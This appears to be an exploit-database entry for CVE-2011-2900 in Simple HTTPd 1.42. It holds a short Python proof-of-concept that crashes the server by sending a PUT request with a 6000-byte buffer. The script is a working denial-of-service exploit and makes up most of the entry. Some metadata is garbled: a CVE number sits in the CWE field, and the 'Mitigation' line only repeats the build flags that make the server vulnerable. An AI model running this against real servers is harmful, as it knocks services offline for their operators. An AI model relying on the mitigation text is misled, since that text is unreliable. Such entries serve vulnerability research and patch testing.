header-logo
Suggest Exploit
vendor:
Simple HTTPd
by:
G13
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Simple HTTPd
Affected Version From: 1.42
Affected Version To: 1.42
Patch Exists: NO
Related CWE: 2011-2900
CPE: shttpd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP1
2011

Simple HTTPd 1.42 PoC DoS

Simple HTTPd is still affected by the bug. The executable must be compiled with -DNO_AUTH and -D_DEBUG enabled. The exploit sends a buffer of 6000 A's to the server, causing it to crash.

Mitigation:

Compile the executable with -DNO_AUTH and -D_DEBUG enabled.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link: 
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit 
still works.
# Simple HTTPd is still affected by the bug. The executable must be 
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.

import socket, sys


buf = "A" * 6000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))

s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()